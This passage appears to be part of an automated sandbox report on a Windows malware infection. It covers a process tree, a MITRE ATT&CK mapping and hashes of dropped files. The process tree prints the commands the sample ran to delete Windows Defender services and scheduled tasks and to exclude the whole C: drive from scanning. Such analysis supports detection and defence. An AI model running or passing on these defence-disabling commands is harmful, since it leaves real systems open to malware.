        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:5620
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:1076
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:4424
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:3516
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:5672
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:3904
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:2464
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:5588
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:5248
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:5352
      - C:\Users\Admin\AppData\Local\Temp\10467190101\Lkp52R3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10467190101\Lkp52R3.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4352
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1588
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:432
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1792
      - C:\Users\Admin\AppData\Local\Temp\10467200101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10467200101\amnew.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:392
      - C:\Users\Admin\AppData\Local\Temp\10467210101\23c170f0c6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10467210101\23c170f0c6.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:4788
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10467210101\23c170f0c6.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5088
      - C:\Users\Admin\AppData\Local\Temp\10467220101\48a26aad3a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10467220101\48a26aad3a.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:5676
      - C:\Users\Admin\AppData\Local\Temp\10467230101\UZPt0hR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10467230101\UZPt0hR.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:3128
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:2464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3520
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:5052
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        Executes dropped EXE
        
        PID:3740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath C:\
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:12984
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        Deletes itself
        Executes dropped EXE
        
        PID:3904
      - C:\Users\Admin\AppData\Local\Temp\10467240101\LJl8AAr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10467240101\LJl8AAr.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3368
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5260

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\$77Steam.exe
1⤵
PID:764
- C:\Users\Admin\AppData\Local\$77Steam.exe
  C:\Users\Admin\AppData\Local\$77Steam.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4968

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3708

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:5300

C:\Users\Admin\AppData\Local\$77Steam.exe
C:\Users\Admin\AppData\Local\$77Steam.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:4608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:4352

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1632

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:2256

C:\Users\Admin\AppData\Local\$77Steam.exe
C:\Users\Admin\AppData\Local\$77Steam.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4508

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
622bf737a997b9a257f15dc3b9ee9da5

SHA1
6beba023f9c081393b64de079969e948a47be8be

SHA256
bcefb9a5dbc47579f8b52cc37fd7591a0e20f00f0a7867df0232088db90273d7

SHA512
c1833c09ef0b3e643b8657874e8a99d7d154ac255c326d85fccba53aa57679e7dad93e61b3b8419937cb7ad936eab727c5edd6c4be6b988982c1d61505305e77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
25604a2821749d30ca35877a7669dff9

SHA1
49c624275363c7b6768452db6868f8100aa967be

SHA256
7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

SHA512
206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\LG3N0E1S\service[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\LG3N0E1S\soft[1]

Filesize
3.0MB

MD5
866664b3ce72c7dad2ffc552282ddd7c

SHA1
43404be154db8ee32dc7c59de01f015235e44de2

SHA256
630af8886f6e7b8cb7b530ed641a4ddf20eec3bedd2a5aa60285b5a5805a603a

SHA512
a0b5eb5438cedaa60b6f23ea9daaa3e71cddfca906f933f3a3a44d04cb63427a1fb6ea4153bf4027d767ef5620ab0e6712257f3ea5e508d74662f1596dfcc712

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
425e2465985006f283c62df3118c083b

SHA1
3223a9b409d466fd8fd9f8ee7525c5f003e856a5

SHA256
833c7a785bf39ad76140f6aba7ed0e46fcec85770a1603391c727651af309caf

SHA512
38c211738571e90e23f8ab060b0a34f17af5ff59a4bda7768246ad2b4ef5ba77fbaeac7a6d713f24bbd0dec868931d00a152c60232ed62889074e918475c0cf2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
24d557d38e9539330f409de428a4e603

SHA1
cf712c60093ccf9f732cfcd4c0c1cd700854d6cd

SHA256
aee07bf8be2a6ae9cd0319c18cb773442d20dec280b19b97417128f30a0a3609

SHA512
a653622634caa4c5a02ec52577b45a2d14ce57ad56d0a01fec2a8034ff3cc075b0569b01b6901c606234d08a3c805b76962be89bd65faf3c65c9115ac39eb08e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
eed3c1c043e9938a6c8088fff5917553

SHA1
bccc2baa525dc15473f9325db53bba47d3ec0bcd

SHA256
74f66ad8a3ce38a72f659dc62ea81a7afdd38a4fbbdc7b8beb3c4c3297e18cef

SHA512
3953d543bb8b13800a048cd93a1480b558f100de1849364ded9b15290ccd91c0c573b7611a6b5014a099a89ec4ee4a8714f7d089f9f44c4e56ecf2d3f822f370

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
75d224e238a397659d8e5cf458a41143

SHA1
d182d16283d3d864a2e328b677551428c29ad6df

SHA256
6a98fa5e6c5b77722f2bd8c855fd14d6bf545fc35b292252d1dc136b89ed2fee

SHA512
3477f3b4182ffdccc817de4242c8fcba706c193a0de5170cd023f8df3d330487d7e372556524b5a0fe1df56de40923700f3f8368eadf6601970e347cbcf078cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
b1a1d8b05525b7b0c5babfd80488c1f2

SHA1
c85bbd6b7d0143676916c20fd52720499c2bb5c6

SHA256
adad192fc86c2f939fd3f70cb9ad323139a4e100f7c90b4454e2c53bdbc9b705

SHA512
346c6513c1373bab58439e37d3f75de1c5c587d7eb27076cf696e885a027b3b38d70b585839d1a2e7f2270cdcf0dac8c1fdff799f3b1158242ae9e3364c2a06e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
b658f30e3438b5d96ed626c15d396f8a

SHA1
14b10064e9cfad19db81bbddce762a741d74b0b3

SHA256
7750061257714874e2ee112841702754a9c68d28c478201b03bcd5f06f8bb016

SHA512
8a7e62f7ceda3401e913f9d9bc92a62846d31942bbb03f1a70a5cfecbacb3cce73a8ff8e841875701e7a97ce96c688c89497ec62f4ca25a6fe06dfdef1627836

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\056i5meh.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9

Filesize
13KB

MD5
c02bfa5bf0fbd514717ff7434a01b90b

SHA1
1b93541d0a7070c11031e6fbaecc7570cf3993f8

SHA256
9262d71fcd1ea907531ab4bb50be777f2c30751a6f75808e7c89f3e60450d2d9

SHA512
d2d2f8435b4901a0f70b05ca1cc5d630b77acd2a7337cdc4581e6655c6b3157c436f77a8b665b65108b4f4e85ae5c6bf61d65ef6784456948f66460a9a4615f3

Download Submit
C:\Users\Admin\AppData\Local\Temp1L5OP5SHBUOSUSSY0NIRCY8HWFSIPT9P.EXE

Filesize
1.8MB

MD5
d58c48d553f783c3aeb67105dcdd456c

SHA1
a46808515a95211ced84861d91d7dc841934d56d

SHA256
7e79491e36de97935935ddf6b599246ce1100579e94c0e4d7517789fb11c011d

SHA512
4ca339a163c0948b454cf8be544fb8d9c19a6bf32c4600ef63b0c48e3025c710219a644cd726f54774c29b06fb420ac5f2a4b8937cf027e185bc6213687c4329

Download Submit
C:\Users\Admin\AppData\Local\Temp\10052500101\f7e9929970.exe

Filesize
4.3MB

MD5
8c6e1bc6d620719f532869493002d55f

SHA1
ab79f93de1c0a09a3cbd9c002cb004a2f86d8b21

SHA256
c4bbc97ac1c840a99e835715572924032551fa123513211a1b6f3686374178db

SHA512
1ff55ba1aba5f5ce1b29f01151e3de0f6c3f16ba5177ea3e1d7e59ce433437d30b2b9a56626c64980480b7e081f0fb3b5669ca041a3d3484c84522e2b3cbf651

Download Submit
C:\Users\Admin\AppData\Local\Temp\10052510101\25c18530d2.exe

Filesize
5.9MB

MD5
e05432c13d42b8526ce4bc0dc240d297

SHA1
db6e9382425055030662ecdc95d6405d30dcf82a

SHA256
574c5ba90e69460799a53ea6fc88d8c6ba4b2b749f739f61779e1975e53e15d9

SHA512
56ad65cc3608f67b680599f8769a0bb0a8b16bdaaf62569c517fa54e72c12671d57472c1e88baaa13cf69a95b84887c527cba666abbca61a923d380dd71481ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\10464271121\ccosvAs.cmd

Filesize
1.4MB

MD5
2f0f5fb7efce1c965ff89e19a9625d60

SHA1
622ff9fe44be78dc07f92160d1341abb8d251ca6

SHA256
426b6e77a4d2e72edf8cd6177578a732ca05510b56cb58d938d6e25820dc2458

SHA512
b8587d32e98693f08c9c3776ac4168204d76dd6db0d76c6afc815d6727d745f6137ae83fe85a7562517b37c320ddebc27167a9f3f14dacca33954dbe437dc920

Download Submit
C:\Users\Admin\AppData\Local\Temp\10465960101\amnew.exe

Filesize
429KB

MD5
22892b8303fa56f4b584a04c09d508d8

SHA1
e1d65daaf338663006014f7d86eea5aebf142134

SHA256
87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f

SHA512
852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744

Download Submit
C:\Users\Admin\AppData\Local\Temp\10466520101\Lkp52R3.exe

Filesize
301KB

MD5
31c64921a822d1e92bd20faa86187851

SHA1
d41040fa55e23dfad38c522986869187377cf9c1

SHA256
232b9673248323ee9d30950b24aa78ea4764635cba3ade58d681450591892292

SHA512
914562049611d22a20bc317c4a5414f34921471a463adb37bacfab6a870cab677ff0b193a7892cb02f299a8f6b6a7db1c871583344a9e167cb9ab3e4ad158258

Download Submit
C:\Users\Admin\AppData\Local\Temp\10466830101\mTk60rz.exe

Filesize
11.6MB

MD5
e717d08f2813115fea75f3423b85bbce

SHA1
38da94cd4447748b80e919c13108ac61cd67c486

SHA256
cf7e773ff75c1b2f3df3a804eef95b68e5f9e5c3954cb60e85916da9512757c1

SHA512
b6912bd37710a68e754822c50d4ad9b5dd359b52bc226ea699829af36161dc2ce69014919f0a8cbfe2211ceb8de2128eed2169d2e92f577405234b05191c822f

Download Submit
C:\Users\Admin\AppData\Local\Temp\10467130101\bb3887a024.exe

Filesize
938KB

MD5
c12af6657af1290febca1788ab396c7b

SHA1
39ef6d76d8785236c83968559d83cfceff333fd3

SHA256
f9c0dc25b85a42a8c0ce701d101c7cbeb96d558f22b1187c8f9d1482368326b1

SHA512
1ce33a52efd9312285f2cfe95b78965ed9d53a64e89eac94a9c15a6abeeba4e11e6e8e6c3d44fc825546b14e6901ffad53c38d6e15794a9d37767185f31b9211

Download Submit
C:\Users\Admin\AppData\Local\Temp\10467140101\bafa6cb643.exe

Filesize
1.8MB

MD5
9815acb1362af625b408bf388513d714

SHA1
8754cadb98514e1231cd5bed6b94a421cb968ffd

SHA256
e82ae0081de3bcbd0cd31ca40b50419f193fdc285c05ad4ff36bd301aabffd80

SHA512
060c00e3b5ab6b2c3185cb56b3a4f5b04a5cf7e3a5cad0a0115ea81c382d1b7580de0923bd6d7a9fc448be51c2f9f58221346c27fff9dd9f9b1133d98e34ab71

Download Submit
C:\Users\Admin\AppData\Local\Temp\10467150101\f43444a477.exe

Filesize
2.0MB

MD5
e79226d37e3aa14676fd0999937a9434

SHA1
3863fc38995488eba05b951c4f68bccd8a327cf5

SHA256
92f333ea066465307636a6acc20e770e0b765e0f77fd4fb14a334ac565d93aff

SHA512
664df6ec96d33d2a535a84a857b9ab1904e4e510f14408f4ace043d778b79783de8b5f9d4e9130482e998213997128353a48febb173ec2d68d15244b899d0811

Download Submit
C:\Users\Admin\AppData\Local\Temp\10467160101\a1a23f99c9.exe

Filesize
2.3MB

MD5
aa645e1f313267d49740ab25f9c018c2

SHA1
dc0c3d14f8b0a0f439332c82383e032b3f52d52c

SHA256
9ebf2fba261cfff5143a6b980a5a0194e95da0fa78ce46749bfee01d708013c8

SHA512
95b72df63c589694a0046b859ac4079020ef26096e5d5bcb0020683924b4c173e49f370383f293b094690d42365266e47c9a9bab1378fa06df9824302bcdf480

Download Submit
C:\Users\Admin\AppData\Local\Temp\10467170101\f3cca57da9.exe

Filesize
942KB

MD5
d57d0e0d344b3ccf31ea017d2000e42a

SHA1
aec7179261837379c8c9679ac4422a8fbec20ec6

SHA256
cfaf390445fa2d816e164390fc33a6a50a38e590446f4f26c9fed12269e70326

SHA512
db443ee52260a66cb6ff06df7cc0fe13454612fafe9ae4575ca73cb67011bbb7116a42f55b6df92366a7fb3f74e6f7259fd32bbba3da9950618d25a0672d101d

Download Submit
C:\Users\Admin\AppData\Local\Temp\10467180101\apple.exe

Filesize
327KB

MD5
af4d2379e28fd1c9d99ab993ed99d345

SHA1
53be762be7859652114bc19510d7828780600c7f

SHA256
502efda7464100a47d48e9fff2812bfee072050135146182390ce1a47ba808c8

SHA512
4f3f703e2b4a7e1ba82390ec3e5f8a5880e7c9998e522bc2a036182d68c43bb3a2797a7295e77be8fb311699259084b67069029201d00736eea9db28a857699e

Download Submit
C:\Users\Admin\AppData\Local\Temp\10467220101\48a26aad3a.exe

Filesize
1.8MB

MD5
c278d25e8e3cabab54399641062d25d8

SHA1
8d916bfa44ea4c36327b40c8330fba8714935aa5

SHA256
b0bd0e2de8b09c9191e3e58b9d0227a0166e6c35d16c617a890f01923169d680

SHA512
4b403f78e246c4dd87b5043321aedef0ce8853accf6c456079a688c8eec8600ea388aad19f4f8f11584ed5ff4a72695ddea6fc58fac6ae7c1ed7750a06f74390

Download Submit
C:\Users\Admin\AppData\Local\Temp\10467230101\UZPt0hR.exe

Filesize
1.2MB

MD5
79c47af6671f89ba34da1c332b5d5035

SHA1
4169b11ea22eb798ef101e1051b55a5d51adf3c2

SHA256
6facc38b5b793b240f3a757e0e22187f3b088340ec02c87d90250c2ced4c1600

SHA512
ddda1bf13778e4a8aed6e6f50043512dd54e2f87f8aecef4516a64edc586e9ce6a8b29c792d7cfbc51a1a15d1ec1c4108383a8866ff2a911a8917af6dc2e57b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\10467240101\LJl8AAr.exe

Filesize
1.1MB

MD5
bc46237c0ee35460cef7da8ec65440f8

SHA1
186153ace97f0d80b53b2edc1be8ce595d033f71

SHA256
b506e7fefab2f19cd0e1ed9ca6fddf1dcc57e149806e5fe67eb223e31340bb92

SHA512
bafa7de2b2e5f11a344b6089f0981859db8e5ecffb2e80b263cb1f422e42b4fa471fdbabfbdf13ba594c8d1048f630812cfb8fb2266b580bdb1585a4f3105c48

Download Submit
C:\Users\Admin\AppData\Local\Temp\272.exe

Filesize
88KB

MD5
89ccc29850f1881f860e9fd846865cad

SHA1
d781641be093f1ea8e3a44de0e8bcc60f3da27d0

SHA256
4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

SHA512
0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

Download Submit
C:\Users\Admin\AppData\Local\Temp\H2BJ1kxe1.hta

Filesize
717B

MD5
60c9f3f213f5f41f82ffd66b458a4ef3

SHA1
b04f35f22963256d71a922c4d6ba02799a75060e

SHA256
a0b63706d394b61e134fc46423af5491ec0cf84b3f612437d75da13d57d3db3f

SHA512
f4d73f03a38f466de7325bbf5def7d505eabcdbeb99228162e1c68d6b802b3881211d1bc99cbdb44c08ea4271fb631a473e7f4b1ee7d2ed6eb4d95d39c49bae4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_bz2.pyd

Filesize
83KB

MD5
30f396f8411274f15ac85b14b7b3cd3d

SHA1
d3921f39e193d89aa93c2677cbfb47bc1ede949c

SHA256
cb15d6cc7268d3a0bd17d9d9cec330a7c1768b1c911553045c73bc6920de987f

SHA512
7d997ef18e2cbc5bca20a4730129f69a6d19abdda0261b06ad28ad8a2bddcdecb12e126df9969539216f4f51467c0fe954e4776d842e7b373fe93a8246a5ca3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_queue.pyd

Filesize
31KB

MD5
e1c6ff3c48d1ca755fb8a2ba700243b2

SHA1
2f2d4c0f429b8a7144d65b179beab2d760396bfb

SHA256
0a6acfd24dfbaa777460c6d003f71af473d5415607807973a382512f77d075fa

SHA512
55bfd1a848f2a70a7a55626fb84086689f867a79f09726c825522d8530f4e83708eb7caa7f7869155d3ae48f3b6aa583b556f3971a2f3412626ae76680e83ca1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_socket.pyd

Filesize
81KB

MD5
69801d1a0809c52db984602ca2653541

SHA1
0f6e77086f049a7c12880829de051dcbe3d66764

SHA256
67aca001d36f2fce6d88dbf46863f60c0b291395b6777c22b642198f98184ba3

SHA512
5fce77dd567c046feb5a13baf55fdd8112798818d852dfecc752dac87680ce0b89edfbfbdab32404cf471b70453a33f33488d3104cd82f4e0b94290e83eae7bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ssl.pyd

Filesize
174KB

MD5
90f080c53a2b7e23a5efd5fd3806f352

SHA1
e3b339533bc906688b4d885bdc29626fbb9df2fe

SHA256
fa5e6fe9545f83704f78316e27446a0026fbebb9c0c3c63faed73a12d89784d4

SHA512
4b9b8899052c1e34675985088d39fe7c95bfd1bbce6fd5cbac8b1e61eda2fbb253eef21f8a5362ea624e8b1696f1e46c366835025aabcb7aa66c1e6709aab58a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_wmi.pyd

Filesize
36KB

MD5
827615eee937880862e2f26548b91e83

SHA1
186346b816a9de1ba69e51042faf36f47d768b6c

SHA256
73b7ee3156ef63d6eb7df9900ef3d200a276df61a70d08bd96f5906c39a3ac32

SHA512
45114caf2b4a7678e6b1e64d84b118fb3437232b4c0add345ddb6fbda87cebd7b5adad11899bdcd95ddfe83fdc3944a93674ca3d1b5f643a2963fbe709e44fb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dmhk4mwn.0h0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ahcgjm.exe

Filesize
62KB

MD5
eeceb3398418a3fdbf3e15110ca101a9

SHA1
4173bc4eeeb73db0255fbacb1cc9ed49381e22e4

SHA256
4e5e50e8c5829ee58bcd88a9f669d1c7df5365fc1a50e8bfb09aceec464bd35d

SHA512
bad2c4a0245b4efc80dd1c6884a65e2a647c5c3d3e7c36babe1bea9b7491c5c0dae39cb4946e9dbb5becebd441866b15c9a6ee239ec8b883669895db7fe6e054

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_5932_133883593118642454\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_5932_133883593118642454\ZSoeRVBe.exe

Filesize
22.4MB

MD5
a5c226a8897030e93baec7ef14b73012

SHA1
